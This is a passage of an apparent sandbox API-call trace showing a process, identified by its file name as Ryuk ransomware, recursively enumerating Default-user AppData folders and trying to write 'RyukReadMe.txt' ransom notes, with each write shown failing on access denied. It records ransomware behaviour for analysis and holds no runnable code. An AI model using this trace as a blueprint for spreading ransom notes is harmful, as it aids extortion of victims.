dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.945] GetLastError () returned 0x5 [0159.945] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.945] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.945] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.945] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.945] SetLastError (dwErrCode=0x0) [0159.945] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\locallow\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.945] GetLastError () returned 0x5 [0159.945] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.945] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.945] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.945] SetLastError (dwErrCode=0x0) [0159.945] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.945] GetLastError () returned 0x5 [0159.945] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.945] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.945] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.946] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.946] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.946] SetLastError (dwErrCode=0x0) [0159.946] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.946] GetLastError () returned 0x5 [0159.946] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.946] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.946] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.946] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.946] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.946] SetLastError (dwErrCode=0x0) [0159.946] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\identities\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.947] GetLastError () returned 0x5 [0159.947] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.947] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.947] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.947] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.947] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.947] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.947] SetLastError (dwErrCode=0x0) [0159.947] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\identities\\{31810c36-5d23-4cce-a3b4-316ded195c38}\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.947] GetLastError () returned 0x5 [0159.947] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.947] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.947] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.947] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.947] SetLastError (dwErrCode=0x0) [0159.948] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\identities\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.948] GetLastError () returned 0x5 [0159.948] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.948] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.948] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.948] SetLastError (dwErrCode=0x0) [0159.948] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.948] GetLastError () returned 0x5 [0159.948] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.948] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.948] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.950] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.950] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.950] SetLastError (dwErrCode=0x0) [0159.950] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.951] GetLastError () returned 0x5 [0159.951] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.951] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.951] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.951] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.951] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.951] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.951] SetLastError (dwErrCode=0x0) [0159.951] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\credentials\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.951] GetLastError () returned 0x5 [0159.951] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.951] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.951] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.951] SetLastError (dwErrCode=0x0) [0159.951] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.952] GetLastError () returned 0x5 [0159.952] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.952] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.952] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.952] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.952] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.952] SetLastError (dwErrCode=0x0) [0159.952] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.952] GetLastError () returned 0x5 [0159.952] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.952] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.952] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0159.952] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.953] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0159.953] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0159.953] SetLastError (dwErrCode=0x0) [0159.953] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto\\rsa\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.953] GetLastError () returned 0x5 [0159.953] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.953] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.953] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.953] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.953] SetLastError (dwErrCode=0x0) [0159.953] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.953] GetLastError () returned 0x5 [0159.953] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.953] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.954] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.954] SetLastError (dwErrCode=0x0) [0159.954] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.954] GetLastError () returned 0x5 [0159.954] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.954] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.954] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.954] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.954] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.954] SetLastError (dwErrCode=0x0) [0159.954] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.954] GetLastError () returned 0x5 [0159.954] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.954] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.954] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0159.956] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.956] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.956] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.956] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.956] SetLastError (dwErrCode=0x0) [0159.956] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.956] GetLastError () returned 0x5 [0159.956] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0159.956] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.956] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0159.957] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0159.957] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0159.957] SetLastError (dwErrCode=0x0) [0159.957] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.957] GetLastError () returned 0x5 [0159.957] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0159.957] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.957] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0159.957] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0159.957] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0159.957] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0159.957] SetLastError (dwErrCode=0x0) [0159.957] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.957] GetLastError () returned 0x5 [0159.957] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0159.958] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.958] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0159.958] SetLastError (dwErrCode=0x0) [0159.958] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.958] GetLastError () returned 0x5 [0159.958] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0159.958] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.958] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0159.959] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0159.960] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0159.960] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0159.960] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0159.961] SetLastError (dwErrCode=0x0) [0159.961] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.964] GetLastError () returned 0x5 [0159.964] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0159.964] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.964] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0159.964] SetLastError (dwErrCode=0x0) [0159.964] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.965] GetLastError () returned 0x5 [0159.965] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0159.965] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.965] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0159.965] SetLastError (dwErrCode=0x0) [0159.965] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.965] GetLastError () returned 0x5 [0159.965] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.965] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.965] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.965] SetLastError (dwErrCode=0x0) [0159.965] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.965] GetLastError () returned 0x5 [0159.965] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.966] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.966] SetLastError (dwErrCode=0x0) [0159.966] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.966] GetLastError () returned 0x5 [0159.966] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.966] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.966] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.966] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: 